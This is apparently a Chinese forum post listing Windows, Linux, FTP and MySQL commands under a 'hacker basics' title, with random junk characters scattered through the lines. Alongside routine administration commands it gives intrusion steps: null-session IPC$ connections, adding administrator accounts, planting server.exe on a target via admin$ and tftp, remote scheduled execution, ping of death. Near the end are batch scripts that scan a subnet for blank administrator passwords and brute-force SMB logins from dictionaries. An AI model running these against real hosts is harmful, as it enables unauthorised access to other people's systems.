黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
3 ]$ {$ ?+ \  D; A+ fnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 " N) I6 k) V+ N8 Y; {; d. f0 t7 y+ T
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
) k* i. i; C8 inet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
8 ]5 O% ]' R& S# R/ Bnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
% u4 W1 W* g, B1 Xnet use h: /del 删除映射对方到本地的为H:的映射 0 C+ f" u, `' N5 W1 `/ X
net user 用户名　密码　/add 建立用户
' t7 k$ s! p4 W6 Snet user guest /active:yes 激活guest用户 / c# J  S! V; @8 o, U% p6 I
net user 查看有哪些用户
8 r! Y# `- D$ c$ W2 pnet user 帐户名 查看帐户的属性
5 _* p, L  e4 inet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
5 p6 X4 Q9 P0 k+ `) G: h; }* ]net start 查看开启了哪些服务
; I/ _2 ]7 a" {. t* Q# b9 mnet start 服务名　 开启服务；(如:net start telnet， net start schedule) % C' X7 |! O& _! w
net stop 服务名 停止某服务
( w- c7 v: C4 E# w$ S6 I( d2 bnet time \\目标ip 查看对方时间
5 H3 V  M& v4 ]. m: p; U5 @net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 : i  e5 \( x$ {- V8 x9 X( o
net view 查看本地局域网内开启了哪些共享
# ~* [( y, K1 gnet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
. U1 O4 ?+ X. Y- m# p; {net config 显示系统网络设置
8 J! d' d- k1 m; R& y6 n* W, rnet logoff 断开连接的共享 # D5 ~& D- g" P6 e
net pause 服务名 暂停某服务 2 m: |1 d3 k+ }% u+ O
net send ip "文本信息" 向对方发信息 ; d4 u# x# H) i, X) p
net ver 局域网内正在使用的网络连接类型和信息 / _7 C2 F. |5 w3 b5 D9 a
net share 查看本地开启的共享
1 H; N5 g( j5 ^0 N. M) {/ J8 ~net share ipc$ 开启ipc$共享
* @6 G# N. D6 q3 Qnet share ipc$ /del 删除ipc$共享 5 ]9 _7 w; G/ M
net share c$ /del 删除C：共享 $ z; c- h# m% g1 ?8 i& ^( y) I0 o
net user guest 12345 用guest用户登陆后用将密码改为12345
' Z$ I9 ^1 @( V$ k3 V/ o+ Snet password 密码 更改系统登陆密码 ! h: S6 H& x3 o; T/ N2 J
netstat -a 查看开启了哪些端口,常用netstat -an
& i7 \& a8 G5 vnetstat -n 查看端口的网络连接情况，常用netstat -an 6 G( h8 O' J% i0 k  ]
netstat -v 查看正在进行的工作
/ s* Z3 R+ x0 p! l0 Y) Cnetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
  [3 C4 Y( N, \( ^$ ?% Hnetstat -s 查看正在使用的所有协议使用情况 " `: y) W* E; i
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
" l( J: a  f; d1 v7 g$ f& Jtracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
$ \6 Q* m  Y* i0 c1 C* E# i: bping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
$ ~# E3 n! C0 @, p* v; I( Iping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
! h& Y( i3 ?/ U9 ]2 W& Cipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
6 T5 }& |7 c" L$ @1 i" M' gtlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
9 f/ z( T" K5 w6 T. n# P  H5 Ukill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 3 @: M3 h1 `5 F' c$ U
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
. c2 h5 G$ u) U' `* idel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
9 Y5 c3 h* W( C1 Y0 zmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 2 A( G% Y# E, u3 H1 P5 |8 L
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
; F; |: p" P1 I% f% D% Pat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
3 Z: A( t( o. N9 U$ t9 @2 jat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 / v( d- D4 x: R; O- K) O* i
at id号 /delete 停止某个已注册的计划任务
" T; A% N; B; b' |3 |9 Hat 查看所有的计划任务 ; j2 `# W  h$ _. ]9 g; p5 j
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 . X6 K/ s% u3 _# l6 Q) R
finger username @host 查看最近有哪些用户登陆 7 }6 n: m2 T0 O' u
telnet ip 端口 远和登陆服务器,默认端口为23
  u3 S% K  t3 f1 D! t2 o' M* Uopen ip 连接到IP（属telnet登陆后的命令） * w8 T! [4 P" v! M  Q8 C3 L5 [" c
telnet 在本机上直接键入telnet 将进入本机的telnet
1 M& o4 g: a( S# C3 W& ocopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 ; A- M3 U) h  j0 q) D+ g$ t
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 + E5 E( }" X7 A1 b- ~: a& T1 y9 a
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 ' N5 L; V5 H/ {$ H' g- o7 [
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： " P- ~  k( |1 g
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
6 G" a7 l0 A, @) U, @tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
% T, Z, |+ M7 Xtftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
& z* v% A: ^; m0 {/ {, _2 f; eftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
* \/ a1 U: @$ T6 J/ c/ }route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface & R* @' Q+ W8 e( F9 c' _6 |! s2 I* \
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
7 F# E, B  l# f$ Nstart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
) `' d  h* o9 L$ K7 ?3 ?$ l, `mem 查看cpu使用情况
( C8 o9 }# M1 V4 d% Z  c1 aattrib 文件名(目录名) 查看某文件（目录）的属性
6 Q' l. e  x/ y0 H2 M+ A, W* Cattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
/ l6 l" B' V! @4 z& g; b3 Udir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
" B/ ^( F  U4 \" x7 S/ P0 c+ Cdate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 " c7 b8 Y9 _3 ?3 Z
set 指定环境变量名称=要指派给变量的字符 设置环境变量
+ a/ i/ v! L1 c. Hset 显示当前所有的环境变量
/ k1 R/ c" o# x: Y! |9 y* nset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
# s* V3 i' m5 F: w2 spause 暂停批处理程序，并显示出：请按任意键继续.... 3 M9 A8 O) H8 u  Y8 {" y5 N
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
6 B, Z: e) Q! F: p; |1 d' cgoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） - i; {$ C' a) X
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
4 W/ T' H1 Y) D" `for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
1 ^# t' E, S& h0 D3 b$ secho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 5 x3 ?7 A& u. E6 h* h0 ?
echo 信息 在屏幕上显示出信息
9 H' T* f& L4 i5 ~. L' J4 pecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中 5 M0 z" e; @( w! K2 v! c  z1 h8 n+ e8 _
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
9 y! v6 z0 y" zfind 文件名 查找某文件
2 h! ?5 m8 S$ U% ktitle 标题名字 更改CMD窗口标题名字 * o: A& i8 i& `/ h/ M- q6 ]& K
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 0 l# x& |9 s$ X; z. ]
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
; R8 x& S9 s' d8 o4 fprint 文件名 打印文本文件 ; I+ b6 L. t7 K% _! ]$ ?' e) r
ver 在DOS窗口下显示版本信息 * u7 N8 D/ \* P$ ^' v
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） ! }1 I9 b" W+ ~4 N2 P$ @
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
- c3 O9 c$ ]+ x" g3 h5 y& B, ~8 \+ _: Jmd　目录名 创建目录
4 d8 N% i4 S- t( v& `replace 源文件　要替换文件的目录 替换文件
: M7 A* f/ n! ~- A" [, g& \ren 原文件名　新文件名 重命名文件名
9 b$ f7 D  J6 @7 v) R0 B( \tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
$ p; g4 m9 |$ r, Z1 D( Ktype 文件名 显示文本文件的内容 3 O# ^9 L$ E4 ?$ X
more 文件名 逐屏显示输出文件 % r4 [+ f8 Q1 V: b9 B
doskey 要锁定的命令＝字符
: ^0 H4 ^, M# P! b' hdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
% I) r5 S4 j- otaskmgr 调出任务管理器 ' |4 I7 g! z& D! I2 J4 b$ _
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 , b/ W0 l$ y. ~. C' H( j' w4 ?. D+ B
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口   E' S8 o. E8 U0 s' B3 l
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
, T3 P$ o# }  K& z4 Q7 W, Q; Jpath 路径\可执行文件的文件名 为可执行文件设置一个路径。 7 f: \' S- K' U4 H( y3 _, M
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? / i+ i, C/ x. I$ |( q8 ?! V7 r, _
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； : S* v& J6 v- ]/ ]' k7 l0 ]
regedit /e 注册表文件名 导出注册表
' B6 s) x" c# o3 O# g" i* ?0 A) Ocacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 % ]/ D9 Y/ ^5 B' h# X
cacls 文件名 查看文件的访问用户权限列表 " l$ @4 z% m! \* @9 l) b
REM 文本内容 在批处理文件中添加注解
8 `  `/ u/ ~1 V! znetsh 查看或更改本地网络配置情况) {0 a& P) T  j1 y3 l. N. H, M
IIS服务命令：
( |, F- O" n: s. w7 kiisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） : Y* R! ^" t$ J# m; k
iisreset /start或stop 启动（停止）所有Internet服务 & g4 A  q$ A# T) _
iisreset /restart 停止然后重新启动所有Internet服务
& s- f; S8 l. i- V+ B' ^iisreset /status 显示所有Internet服务状态 ( y* S, W& z# `9 t2 s+ h
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
9 o8 g" C6 {8 W: B4 _iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 & j: I& D, g, l) m$ m: R/ s
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
/ j$ h) d4 m* ]; V( [iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
) r% Q8 D4 Z; T% U, {FTP 命令： (后面有详细说明内容) / V8 P" Q: t/ x! ~8 z4 x8 _0 t
ftp的命令行格式为:
' Z  }, H: D) V; f1 P  tftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
( q4 @4 D# Q- i! ^" X; Q) i+ l# I－d 使用调试方式。
! A) b( ~5 x4 K& B3 e－n 限制ftp的自动登录,即不使用.netrc文件。
+ G- i: ^' {- u/ Y" C% D2 S, v－g 取消全局文件名。 8 l8 r" Z5 z/ _8 ^
help [命令] 或 ？[命令] 查看命令说明
5 W6 E' v& `& e  B/ `, Abye 或 quit 终止主机FTP进程,并退出FTP管理方式.
1 a/ Y" q' G0 p& s; ~. q2 E! B+ \pwd 列出当前远端主机目录 * A0 f. ^7 b9 y4 V
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 , h" x" \$ Z6 z
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
4 ]( _% c1 e6 v% wmget [remote-files] 从远端主机接收一批文件至本地主机
5 w8 a; H0 k3 [: H: tmput local-files 将本地主机中一批文件传送至远端主机 % w- D0 }" }0 R* t# P
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 " h9 t4 _2 T& g6 a7 O" e4 y$ d
ascii 设定以ASCII方式传送文件(缺省值) / p' i) @# |  f5 o( w
bin 或 image 设定以二进制方式传送文件 / W2 V; \, ?) R7 p6 i6 L; N
bell 每完成一次文件传送,报警提示
/ e- z2 _( Y8 _cdup 返回上一级目录 . G2 R* H$ m5 O$ }/ T1 k
close 中断与远程服务器的ftp会话(与open对应) 3 R1 s7 V) M+ S3 R
open host[port] 建立指定ftp服务器连接,可指定连接端口
% T, z' U6 q6 a' \! Edelete 删除远端主机中的文件 ; l: \$ h# [( N! Q1 T- _3 Y
mdelete [remote-files] 删除一批文件
/ P7 f' x! r: ^1 O+ zmkdir directory-name 在远端主机中建立目录 ; A, K" @6 Y) H2 z, F
rename [from] [to] 改变远端主机中的文件名
3 ^. f: x- r% Z  irmdir directory-name 删除远端主机中的目录 9 B0 e' N9 O7 v" q
status 显示当前FTP的状态 " Z. U: N5 @" b0 r: s6 N
system 显示远端主机系统类型
% f1 g  E7 b6 y; Luser user-name [password] [account] 重新以别的用户名登录远端主机 3 _9 I  j* y2 y, [5 @! M' k' x7 @
open host [port] 重新建立一个新的连接
% @1 F# R- S  l; J# I3 M* i4 kprompt 交互提示模式
! D2 ~* }# d! C. L9 d7 Q& n$ {% `/ u4 kmacdef 定义宏命令
7 L- E( b0 l" N2 K+ }4 Z- Blcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录   Y: g$ f" C+ H/ R* ?9 F
chmod 改变远端主机的文件权限 0 ~; V7 Z8 ^4 K% S4 }
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
% N8 [5 f" }9 U, _* fcd remote－dir 进入远程主机目录 0 W+ P' E3 k# s1 @, y' K$ m+ J
cdup 进入远程主机目录的父目录 / i2 v. D: A' P1 p5 f5 v
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip 5 d- ]- ]' {. K1 D# T
MYSQL 命令：
3 Y0 f2 d3 e- P2 Y! O8 P8 Imysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。: b! [7 O' }# ~9 x" o* B* }/ U
（例：mysql -h110.110.110.110 -Uroot -P123456 3 _0 }" {( S6 c0 M! w7 B- w
注:u与root可以不用加空格，其它也一样）
0 W! Y2 p' V3 Rexit 退出MYSQL
9 Z+ f2 j( u3 v+ D; L& Tmysqladmin -u用户名 -p旧密码 password 新密码 修改密码
3 }2 H: l! T" y% l8 W. \grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
6 e7 o- p- d, P; a9 C- d) }show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
/ @/ _' m& {2 L1 J- [8 K/ Ouse mysql；1 B) d7 V/ [! h" K6 H* M
show tables; 显示库中的数据表 " T' E$ H  P+ a
describe 表名; 显示数据表的结构
) B  A; ?% r, G% q& R* _+ ]  Vcreate database 库名; 建库
( C% j; Q# V7 o- wuse 库名；
7 w  q9 X2 F# |4 X" g8 I( tcreate table 表名 (字段设定列表)； 建表
+ e$ e; m3 N! x: l" M9 v3 Ldrop database 库名;
4 a5 x0 E7 A0 q" q0 q! Fdrop table 表名； 删库和删表
2 Z0 R2 t3 ~' u; p9 Mdelete from 表名; 将表中记录清空 / {. @& V: g8 o6 [
select * from 表名; 显示表中的记录 7 ^- ]1 n1 o$ y5 I2 y
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 & [& K- R9 g  }% j: ?5 m
win2003系统下新增命令（实用部份）：
9 C1 D( i6 n1 F7 Kshutdown /参数 关闭或重启本地或远程主机。
+ \8 `( Y/ U  K: P参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
/ ^# Y# D- u. S5 K* }, b: }; x例：shutdown /r /t 0 立即重启本地主机（无延时）
0 e( ~1 r) Y5 a( K7 {taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
% [! ^9 q! l" q- s0 _' b/ R7 X参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
, {; Q5 Y; v0 ftasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
+ k* Q$ s! U. F参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程  K+ A' ^! o7 r, m
Linux系统下基本命令： 要区分大小写- W2 u+ A% g5 `9 W# n
uname 显示版本信息（同win2K的 ver） # `8 l5 W# F' T& k& Z% |
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） 6 {% i, l9 Q3 N6 L2 x: @4 y
pwd 查询当前所在的目录位置
; ^' |' c, X* s; c6 F- Tcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
  w* o1 M7 w5 Acat 文件名 查看文件内容
& u/ ^+ m8 P3 |, K: A" r0 ncat >abc.txt 往abc.txt文件中写上内容。
9 C. C" n' l% M' n/ Emore 文件名 以一页一页的方式显示一个文本文件。 " ]* G5 b6 {0 x' f
cp 复制文件 $ E. ?1 a! S# _- d. D
mv 移动文件 : j7 m: h6 Z5 Z" Z% U5 G
rm 文件名 删除文件，rm -a 目录名删除目录及子目录 & \; X6 K/ y4 Y
mkdir 目录名 建立目录 ; I4 w8 e; U7 L. H. U6 }! m8 Z& a
rmdir 删除子目录，目录内没有文档。
; E; A+ C4 c  R" z9 i/ j# l& Ichmod 设定档案或目录的存取权限 * J) q7 ~$ Z+ j( C0 P! q+ q: E8 e
grep 在档案中查找字符串
, `/ M' d# q% |: |3 p  U6 A5 mdiff 档案文件比较 6 j1 J; I. |! r* D( g' y3 S9 S
find 档案搜寻
) _$ f( U, g) g, _  o; cdate 现在的日期、时间 7 o- K. |, G; b! q
who 查询目前和你使用同一台机器的人以及Login时间地点 2 |$ l: F  P$ j* L+ F) F& N
w 查询目前上机者的详细资料
0 v# k% `6 l( f0 Y, P; Uwhoami 查看自己的帐号名称
  z) L; r5 x& B4 _groups 查看某人的Group ( E* @) @3 w2 m/ D( Z. D* R% U
passwd 更改密码
: l( _8 n! Z( E! T( ^. y+ lhistory 查看自己下过的命令 ( i3 E- [6 v' [% A, P. t1 R
ps 显示进程状态 + q7 R$ d' r6 K- r
kill 停止某进程
' u! @, k  A. g5 t$ M8 ~1 `/ ngcc 黑客通常用它来编译C语言写的文件 ( b, |  z2 s- F5 j% ]
su 权限转换为指定使用者 5 J0 k. e: k5 f- `; F1 J1 G. M
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
4 `2 e9 U1 r: F$ B! mftp ftp连接上某服务器（同win2K
5 r- k2 ]$ D* r' j! q3 i7 g附：批处理命令与变量0 \, y7 s5 {2 ]8 e. B3 q
1：for命令及变量 基本格式： 9 E1 w, m& ~( O( u" h4 Q5 V  ^  _' x4 f
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。$ _8 e, m: B/ p$ v4 P/ O
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
1 i  L3 k; l4 Z* X% w9 J(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
; M: J3 J& S- s0 k" d+ ~3 M' Q: K* w  acommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开0 S, h' Y& U9 j4 a2 B6 k7 h6 ?
command_parameters：为特定命令指定参数或命令行开关+ q6 U0 O' F) Y5 J$ F* M
IN (set)：指在(set)中取值；DO command ：指执行command7 l& I" H6 L. |  E" G! X
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 7 Y0 U5 i; o9 j" t& ~' |% i& {
用法举例：
; b& Z+ K/ M1 T8 W: A0 k@echo off 0 o6 }+ J. y  i8 M+ ~
echo 用法格式：test.bat *.*.* > test.txt , t7 ?. H/ S' x) ^$ ^& v1 i
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
; n* v; {* g1 h! G存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。- }$ B: h9 \1 v* r0 x
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 & u. m2 x# ~: j6 T' {  ~
@echo off
$ {, h; x9 c* iecho 用法格式：ok.bat ip 1 \1 x5 W% K" Y" r! F7 l
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
& l' s% z4 h- p. I存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。( E! Z4 @, T3 j
2：if命令及变量 基本格式： 5 C7 ]; Y" b# l0 O
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
$ o3 e4 ?9 a, j8 y7 K例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
3 ~+ m  \4 c. Y, R0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
+ P1 ?! N1 Q" ~8 l; |' SIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
3 p; D9 E$ B" m) A% o. E& u例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） 6 Z0 y% ^8 S7 l! H! o8 y) }
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。! @& l# r1 f, E/ F, t
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 * `" E' d9 [1 G3 |9 H
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”